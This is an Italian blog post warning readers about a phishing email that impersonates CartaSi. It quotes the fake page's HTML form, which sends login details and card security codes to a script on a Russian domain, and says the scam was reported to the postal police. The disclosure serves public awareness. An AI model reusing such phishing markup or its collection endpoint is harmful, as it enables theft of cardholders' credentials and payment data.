credit: Ivan Annibali

Vi segnalo un ingegnoso, ma pur sempre stupidino per un informatico, metodo per truffare i possessori di carte di credito CartaSi. In queste settimane è in giro per la rete una e-mail con il solito e tipico testo dove invitano il titolare della carta ad entrare nel sito di CartaSi cliccando sulla pagina web allegata nell’ e-mail.

Di prima apparrenza è tutto identico e preciso al sito originale, ma andando a leggere l’html del file si trova questo simpatico form:

<form name=”regForm” method=”post” action=”http://stavki-sport.ru/catalog/images/dvd/pt.php“>
<input type=”hidden” name=”fun” id=”fun” value=”start” />
<input type=hidden name=username value=”<?echo $username; ?>”>
<input type=hidden name=password value=”<?echo $password; ?>”>
<div>
<h3></h3>

<p>Benvenuto!<br/>Digita il numero della tua Carta:</p>
<li>il <strong>codice di sicurezza di tre cifre</strong>
che trovi sul retro della tua CartaSi (come da immagine)&nbsp;
<a href=”#” onclick=”javascript:popup(); return false;”>
<img src=”https://portal.cartasi.it/imageserver/titolari/images/cvv2_b.gif”> </a>
</li>
</ul>

In grassetto la parte interessante… state inviando tutti i dati a chissà chi in Russia.

Preso e segnalato alla Pol Post. :-)